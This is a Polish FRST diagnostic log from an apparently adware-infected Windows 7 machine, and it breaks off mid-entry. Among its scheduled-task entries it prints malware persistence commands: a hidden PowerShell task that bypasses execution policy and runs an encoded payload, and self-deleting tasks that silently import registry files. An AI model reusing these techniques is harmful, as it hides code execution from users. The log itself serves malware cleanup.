Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 12-06-2017
Uruchomiony przez ABBA (13-06-2017 12:38:14)
Uruchomiony z C:\Users\ABBA\Downloads
Windows 7 Professional Service Pack 1 (X64) (2017-05-12 19:23:08)
Tryb startu: Normal
==========================================================

==================== Konta użytkowników: =============================

ABBA (S-1-5-21-3347351025-225361290-299367054-1000 - Administrator - Enabled) => C:\Users\ABBA
Administrator (S-1-5-21-3347351025-225361290-299367054-500 - Administrator - Disabled)
Gość (S-1-5-21-3347351025-225361290-299367054-501 - Limited - Disabled)

==================== Centrum zabezpieczeń ========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie.)

AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Zainstalowane programy ======================

(W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.)

1.0.0.1 (HKLM-x32\...\YeaDesktop) (Version: 1.0.0.1 - )
7-Zip 16.04 (x64 edition) (HKLM\...\{23170F69-40C1-2702-1604-000001000000}) (Version: 16.04.00.0 - Igor Pavlov)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe Flash Player 24 NPAPI (HKLM-x32\...\{1D95F7C4-A547-4FC9-91A4-A35B19F597C0}) (Version: 24.0.0.194 - Adobe Systems Incorporated)
Adobe Flash Player 24 PPAPI (HKLM-x32\...\{00D77C52-95CA-4E13-9ED1-1FE49E8F2D49}) (Version: 24.0.0.194 - Adobe Systems Incorporated)
Age of Wonders 3 (HKLM-x32\...\Age of Wonders 3_is1) (Version: 1.8.0.2 - Triumph Studios)
AMD Catalyst Install Manager (HKLM\...\{37FCE154-7F59-74F0-3A35-BF503CEB230B}) (Version: 8.0.877.0 - Advanced Micro Devices, Inc.)
Anti-Vibrate Oscar Editor (HKLM-x32\...\InstallShield_{5600BE52-805C-4847-93F2-7921116ED0B3}) (Version: 12.08.0005 - A4TECH)
BS.Player FREE (HKLM-x32\...\BSPlayerf) (Version: 2.71.1081 - AB Team, d.o.o.)
Don't Starve Together (HKLM\...\Steam App 322330) (Version: - Klei Entertainment)
DriverMax 9 (HKLM-x32\...\DMX5_is1) (Version: 9.31.0.206 - Innovative Solutions)
Europa Universalis IV (HKLM\...\Steam App 236850) (Version: - Paradox Development Studio)
Fraps (HKLM-x32\...\Fraps) (Version: - )
Free Download Manager (HKLM\...\{43781dff-e0df-49ce-a6d2-47da96a485e7}}_is1) (Version: - FreeDownloadManager.ORG)
Generic Universal PCL (HKLM\...\Generic Universal PCL) (Version: - Generic)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
Heroes of Might and Magic 4 Complete (HKLM-x32\...\Heroes of Might and Magic 4 Complete_is1) (Version: - GOG.com)
Heroes of Might And Magic IV: Equilibris (HKLM-x32\...\Equilibris) (Version: - )
Java 8 Update 121 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
LSI HDA Modem (HKLM\...\LSI Soft Modem) (Version: 2.2.100 - LSI Corporation)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft Office Professional 2016 - pl-pl (HKLM\...\ProfessionalRetail - pl-pl) (Version: 16.0.8067.2115 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\OneDriveSetup.exe) (Version: 17.3.6799.0327 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
Office 16 Click-to-Run Extensibility Component (Version: 16.0.8067.2115 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.8067.2115 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (Version: 16.0.7668.2066 - Microsoft Corporation) Hidden
Online Application (x32 Version: 2.6.0 - Microleaves) Hidden <==== UWAGA
OSCAR Editor (x32 Version: 12.08.0005 - A4TECH) Hidden
Search module (HKLM-x32\...\Search module) (Version: - Goobzo) <==== UWAGA
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Steel Division: Normandy 44 (HKLM-x32\...\Steel Division: Normandy 44_is1) (Version: - )
System Healer (HKLM-x32\...\SystemHealer) (Version: 4.4.0.3 - SystemHealer) <==== UWAGA
The Battle for Middle-earth (tm) II (HKLM-x32\...\{2A9F95AB-65A3-432c-8631-B8BC5BF7477A}) (Version: - )
The Lord of the Rings, The Rise of the Witch-king (HKLM-x32\...\{B931FB80-537A-4600-00AD-AC5DEDB6C25B}) (Version: - )
YoutubeAdBlock (HKLM-x32\...\E3605470-291B-44EB-8648-745EE356599A) (Version: 2.0.0.248 - Company Inc.) <==== UWAGA

==================== Niestandardowe rejestracje CLSID (filtrowane): ==========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

CustomCLSID: HKU\S-1-5-21-3347351025-225361290-299367054-1000_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\ABBA\AppData\Local\Microsoft\OneDrive\17.3.6799.0327\amd64\FileCoAuthLib64.dll (Microsoft Corporation)

==================== Zaplanowane zadania (filtrowane) =============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

Task: {1FA7787D-E001-440B-8F78-6A90C0B67F78} - System32\Tasks\DriverMaxAgent => C:\Program Files (x86)\Innovative Solutions\DriverMax\drivermax.exe [2017-05-09] (Innovative Solutions)
Task: {22F0B089-E16D-4E2D-BCFE-C41BE43688C8} - System32\Tasks\DriverMaxWelcome => C:\Program Files (x86)\Innovative Solutions\DriverMax\drivermax.exe [2017-05-09] (Innovative Solutions)
Task: {272329ED-57C8-4DCD-B381-F1545C96B284} - System32\Tasks\psv_Gravelam => cmd.exe /c regedit.exe /s "C:\ProgramData\AppriabuS\Free-Dox.reg" & del "C:\ProgramData\AppriabuS\Free-Dox.reg" & SCHTASKS /Delete /TN "psv_Gravelam" /F <==== UWAGA
Task: {443B203D-30EA-4815-BED3-B4D3795F3C98} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated)
Task: {45AE2A38-DA0C-4818-A515-F4164751F0EA} - System32\Tasks\psv_Softlex => cmd.exe /c regedit.exe /s "C:\ProgramData\AppriabuS\HoldFresh.reg" & del "C:\ProgramData\AppriabuS\HoldFresh.reg" & SCHTASKS /Delete /TN "psv_Softlex" /F <==== UWAGA
Task: {480AC5AC-7410-4CEF-858C-149819C78172} - System32\Tasks\System Healer Task => C:\Program Files (x86)\SystemHealer\RescueMonitor.exe [2016-12-26] () <==== UWAGA
Task: {4C70AA96-CBFE-4C85-BD09-DD13AA05230B} - System32\Tasks\psv_Ontoin => cmd.exe /c regedit.exe /s "C:\ProgramData\AppriabuS\Treeis.reg" & del "C:\ProgramData\AppriabuS\Treeis.reg" & SCHTASKS /Delete /TN "psv_Ontoin" /F <==== UWAGA
Task: {4DB5856F-7FCC-4160-9244-B43B3963BA1A} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-05-14] (Microsoft Corporation)
Task: {4F3F91C2-4B97-4982-B2E2-BF56C1E73A68} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-04-18] (Microleaves) <==== UWAGA
Task: {4FECAAB3-D2DE-4A3F-B30D-3D2D48935C66} - System32\Tasks\E3605470-291B-44EB-8648-745EE356599A2 => Rundll32.exe "C:\Program Files (x86)\YtubeABlckU\ErT7J6V.dll",#1
Task: {5326893D-65F6-41B5-987F-64944B92404F} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe [2016-12-26] () <==== UWAGA
Task: {67163D51-2C87-4F0D-A642-D96375997C94} - \snp -> Brak pliku <==== UWAGA
Task: {67CBC653-A1EA-484C-9208-7A3E3475F9A2} - System32\Tasks\{7A0F0D47-0F0B-0B0E-7D11-787E0C0F1108} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgACAAIAAgACAAOwAgACAAIAA7ACAAOwA7ADsAIAA7ADsAIAAgADsAOwA7ACAAOwAgACAAOwA7ADsAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUA (dane wartości zawierają 10072 znaków więcej). <==== UWAGA
Task: {70E8C2AC-CE19-4CB7-A64D-60E966D41D32} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== UWAGA
Task: {7709290C-886B-47A0-B6E5-7B93A5D558F1} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-05-26] ()
Task: {786D3046-7915-49ED-AE02-A4A85E69E63E} - System32\Tasks\FreeDownloadManagerNetworkMonitor => C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\winwfpmonitor.exe [2017-05-18] (FreeDownloadManager.org)
Task: {7CBB39E2-31D5-4780-9B99-9292C66AE4F0} - System32\Tasks\psv_Tamp-Zap => cmd.exe /c regedit.exe /s "C:\ProgramData\AppriabuS\Inchfind.reg" & del "C:\ProgramData\AppriabuS\Inchfind.reg" & SCHTASKS /Delete /TN "psv_Tamp-Zap" /F <==== UWAGA
Task: {7F42AF9E-F076-4E33-AE96-1A235BF22664} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-05-25] (Google Inc.)
Task: {8E87D8EB-925F-4017-8F11-3FDB37AE1EE2} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-05-14] (Microsoft Corporation)
Task: {987E8443-F673-4E9A-B5F6-2C477B4A50C9} - \snf -> Brak pliku <==== UWAGA
Task: {9ABAB7AC-8C1F-4899-B9B4-240D0DE78826} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== UWAGA
Task: {AD456F62-9032-4D67-982B-EFF665609522} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-12-26] () <==== UWAGA
Task: {B1FB20EF-B3E2-4B18-BCD5-592E4A03FD4F} - System32\Tasks\psv_Saotouch => cmd.exe /c regedit.exe /s "C:\ProgramData\AppriabuS\Lamstring.reg" & del "C:\ProgramData\AppriabuS\Lamstring.reg" & SCHTASKS /Delete /TN "psv_Saotouch" /F <==== UWAGA
Task: {C1956C73-47CE-42E1-8EB4-98B2C98C8D5A} - System32\Tasks\E3605470-291B-44EB-8648-745EE356599A => Rundll32.exe "C:\Program Files (x86)\YtubeABlckU\ErT7J6V.dll",#1
Task: {C7F32682-3F97-4A7F-AFDC-970F3CC0903A} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-12-26] () <==== UWAGA
Task: {CA501574-8E28-469A-AC45-809F0BB9AC85} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-05-26] ()
Task: {D19FD346-3054-4EFB-9A6E-98CE8E2A4AC9} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-05-25] (Google Inc.)
Task: {D506D427-12AD-44C8-93E4-88DB5D230545} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_24_0_0_194_pepper.exe [2017-05-12] (Adobe Systems Incorporated)
Task: {D9854AD6-5789-42CA-B9C6-FF1F2F02CC23} - System32\Tasks\Application Starter - f1375f225883e83d52e8db9690775c3c => C:\Program Files (x86)\Innovative Solutions\DriverMax\innostp.exe [2017-05-09] (Innovative Solutions)
Task: {E100684C-27BA-4968-8EAE-44FB71BA8BBD} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== UWAGA
Task: {EE00D26D-C1D9-4972-8B97-C6776D4F7005} - System32\Tasks\psv_LabToron => cmd.exe /c regedit.exe /s "C:\ProgramData\AppriabuS\Vilabam.reg" & del "C:\ProgramData\AppriabuS\Vilabam.reg" & SCHTASKS /Delete /TN "psv_LabToron" /F <==== UWAGA
Task: {F55D037A-88BE-41DA-B2DD-19642D17B8AC} - System32\Tasks\DriverMax Notification => C:\Program Files (x86)\Innovative Solutions\DriverMax\drivermax.exe [2017-05-09] (Innovative Solutions)
Task: {F64CAD2A-59A3-483C-8E3F-3C983180333B} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-12] (Adobe Systems Incorporated)

(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)

Task: C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_24_0_0_194_pepper.exe
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\E3605470-291B-44EB-8648-745EE356599A.job => C:\Program Files (x86)\YtubeABlckU\ErT7J6V.dll
Task: C:\Windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
Task: C:\Windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
Task: C:\Windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
Task: C:\Windows\Tasks\System HealerPeriod.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== UWAGA
Task: C:\Windows\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== UWAGA
Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== UWAGA

==================== Skróty =============================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)

ShortcutWithArgument: C:\Users\ABBA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"

==================== Załadowane moduły (filtrowane) ==============

2017-05-15 22:36 - 2017-03-05 09:35 - 00022528 _____ () C:\Windows\System32\us005lm.dll
2017-05-26 18:50 - 2017-05-18 16:15 - 00029696 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\WinDivert.dll
2016-12-26 12:19 - 2016-12-26 12:19 - 01582240 _____ () C:\Program Files (x86)\SystemHealer\HealerConsole.exe
2017-05-12 22:48 - 2017-06-13 12:27 - 00017920 _____ () C:\Windows\System32\rpcnetp.exe
2017-05-26 18:50 - 2017-04-13 11:42 - 02158592 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\avformat-57.dll
2017-05-26 18:50 - 2017-04-13 11:42 - 12242432 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\avcodec-57.dll
2017-05-26 18:50 - 2017-04-13 11:42 - 00138752 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\swresample-2.dll
2017-05-26 18:50 - 2017-04-13 11:42 - 00485376 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\avutil-55.dll
2017-05-26 18:50 - 2017-04-13 11:42 - 01825792 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\avfilter-6.dll
2017-05-26 18:50 - 2017-04-13 11:42 - 00662016 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\swscale-4.dll
2017-05-26 18:50 - 2017-04-13 11:46 - 69740544 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\libcef.dll
2017-05-26 18:50 - 2017-04-13 11:45 - 02323456 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\libglesv2.dll
2017-05-26 18:50 - 2017-04-13 11:45 - 00094208 _____ () C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\libegl.dll
2012-08-17 11:44 - 2012-08-17 11:44 - 03345408 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\OscarEditor.exe
2017-06-13 11:50 - 2017-06-13 11:50 - 00126976 _____ () C:\Users\ABBA\AppData\Roaming\67b8914af1d4424090aa08cd7787f6af\kirlSC3gvg.exe
2013-06-18 15:49 - 2013-06-18 15:49 - 00016384 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2013-04-29 23:08 - 2013-04-29 23:08 - 00369152 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2017-06-13 12:00 - 2017-06-13 12:00 - 00343552 _____ () C:\ProgramData\AppriabuS\U-Ronfax.dll
2017-05-25 11:38 - 2017-05-09 11:13 - 03767640 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\libglesv2.dll
2017-05-25 11:38 - 2017-05-09 11:13 - 00100696 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\libegl.dll
2017-06-13 11:55 - 2017-06-13 11:55 - 00732160 _____ () C:\Program Files (x86)\YtubeABlckIE\mkdVacp9z.exe
2017-05-12 22:11 - 2017-05-09 08:26 - 00010544 _____ () C:\Program Files (x86)\Innovative Solutions\DriverMax\sync.dll
2010-12-02 17:56 - 2010-12-02 17:56 - 00815104 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\Data\X7H\Forms\OSD_Text\OSD_Text.dll
2011-01-09 20:45 - 2011-01-09 20:45 - 00088064 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\DLL\DLL_MouseDeviceManager.dll
2012-06-14 15:59 - 2012-06-14 15:59 - 02414080 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\Data\X7H\Forms\ScreenCapture\ScreenCapture.dll
2012-05-17 11:17 - 2012-05-17 11:17 - 01000448 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\Data\X7H\Forms\TrayIconWebAdvertisement\TrayIconWebAdvertisement.dll
2010-09-20 14:18 - 2010-09-20 14:18 - 00085504 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\DLL\DLL_ZoomControl.dll
2010-09-20 14:18 - 2010-09-20 14:18 - 00054272 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\DLL\DLL_ScrollbarControl.dll
2011-04-12 15:14 - 2011-04-12 15:14 - 00063488 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\DLL\DLL_AnalyzeGesturesInRight.dll
2010-11-01 20:16 - 2010-11-01 20:16 - 00062976 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\DLL\DLL_AnalyzeGesturesInOne.dll
2012-04-27 11:40 - 2012-04-27 11:40 - 00118272 _____ () C:\Program Files (x86)\Anti-Vibrate Oscar Editor\DLL\DLL_Wheel4D.dll
2017-06-13 11:55 - 2017-06-13 11:55 - 00877568 _____ () C:\Program Files (x86)\YtubeABlckIE\ku2wY4T.dll
2017-06-13 11:55 - 2017-06-13 11:55 - 00548864 _____ () C:\Program Files (x86)\YtubeABlckIE\fdd1yA.dll

==================== Alternate Data Streams (filtrowane) =========

(Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.)

==================== Tryb awaryjny (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.)

==================== Powiązania plików (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.)

==================== Internet Explorer - Witryny zaufane i z ograniczeniami ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.)

==================== Hosts - zawartość: ===============================

(Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)

2009-07-14 04:34 - 2017-06-13 12:31 - 00000824 _____ C:\Windows\system32\Drivers\etc\hosts

==================== Inne obszary ============================

(Obecnie brak automatycznej naprawy dla tej sekcji.)

HKU\S-1-5-21-3347351025-225361290-299367054-1000\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Zapora systemu Windows [funkcja włączona]

==================== MSCONFIG/TASK MANAGER - Wyłączone elementy ==

==================== Reguły Zapory systemu Windows (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [TCP Query User{D5C62BE5-0E60-411A-98C3-237029766954}C:\program files\freedownloadmanager.org\free download manager\fdm.exe] => (Block) C:\program files\freedownloadmanager.org\free download manager\fdm.exe
FirewallRules: [UDP Query User{1CE8FBCF-1877-4C9D-8550-A41B3B5AC767}C:\program files\freedownloadmanager.org\free download manager\fdm.exe] => (Block) C:\program files\freedownloadmanager.org\free download manager\fdm.exe
FirewallRules: [TCP Query User{9B7DA599-9DC4-42D5-8CD7-31668AF5E777}C:\program files (x86)\google\chrome\application\chrome.exe] => (Block) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{E40758D1-DA70-4E9F-954D-F759F9CE2E43}C:\program files (x86)\google\chrome\application\chrome.exe] => (Block) C:\program files (x86)\google\chrome\application\chrome.exe

==================== Punkty Przywracania systemu =========================

08-06-2017 11:01:30 Zaplanowany punkt kontrolny
08-06-2017 19:34:28 Zainstalowany program DirectX
08-06-2017 21:05:52 Zainstalowany program DirectX
08-06-2017 21:57:37 Instalacja pakietu sterownika urządzenia: SysProgs.org Kontrolery magazynu
13-06-2017 12:07:39 Installed Microsoft Solution - B4164D8C-3813-495A-BBBC-BA51D122A226
13-06-2017 12:18:01 Restore Point Created by FRST

==================== Wadliwe urządzenia w Menedżerze urządzeń =============

Name: Teredo Tunneling Pseudo-Interface
Description: Karta tunelowania Teredo firmy Microsoft
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device. On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

==================== Błędy w Dzienniku zdarzeń: =========================

Dziennik Aplikacja:
==================
Error: (06/13/2017 12:28:57 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (06/13/2017 12:25:59 PM) (Source: Wininit) (EventID: 1015) (User: )
Description: Błąd krytycznego procesu systemowego C:\Windows\system32\lsm.exe z kodem stanu 1. Komputer musi być ponownie uruchomiony.

Error: (06/13/2017 12:21:52 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (06/13/2017 12:18:02 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Przetwarzanie wywołania OnIdentity() w obiekcie System Writer przez Usługi kryptograficzne nie powiodło się.
Details: AddWin32ServiceFiles: Unable to back up image of service rpcnetp since QueryServiceConfig API failed
System Error: Nie można odnaleźć określonego pliku.
.

Error: (06/13/2017 12:07:43 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Przetwarzanie wywołania OnIdentity() w obiekcie System Writer przez Usługi kryptograficzne nie powiodło się.
Details: AddWin32ServiceFiles: Unable to back up image of service rpcnetp since QueryServiceConfig API failed
System Error: Nie można odnaleźć określonego pliku.
.

Error: (06/13/2017 11:52:33 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (06/13/2017 11:51:22 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (06/12/2017 11:02:51 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (06/12/2017 10:30:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: starter.exe, wersja: 1.0.0.1, sygnatura czasowa: 0x593ef3b8
Nazwa modułu powodującego błąd: KERNELBASE.dll, wersja: 6.1.7601.18409, sygnatura czasowa: 0x53159a86
Kod wyjątku: 0xe0434f4d
Przesunięcie błędu: 0x0000c42d
Identyfikator procesu powodującego błąd: 0x1908
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2e3ba8300460c
Ścieżka aplikacji powodującej błąd: C:\Users\ABBA\AppData\Local\Temp\36dd37531d8c45a3b69d29be16e9c005\starter.exe
Ścieżka modułu powodującego błąd: C:\Windows\syswow64\KERNELBASE.dll
Identyfikator raportu: ea926dfe-4fad-11e7-b4f8-00247ead38c0

Error: (06/12/2017 10:22:12 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Dziennik System:
=============
Error: (06/13/2017 12:27:53 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Poprzednie zamknięcie systemu przy 12:26:47 na 2017-06-13 było nieoczekiwane.

Error: (06/13/2017 12:26:14 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Usługa AppriabuS niespodziewanie zakończyła pracę. Wystąpiło to razy: 1.

Error: (06/13/2017 12:25:12 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Usługa Agere Modem Call Progress Audio niespodziewanie zakończyła pracę. Wystąpiło to razy: 1.

Error: (06/13/2017 12:21:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi MaohaWiFiService z powodu następującego błędu: Nie można odnaleźć określonego pliku.

Error: (06/13/2017 12:20:01 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
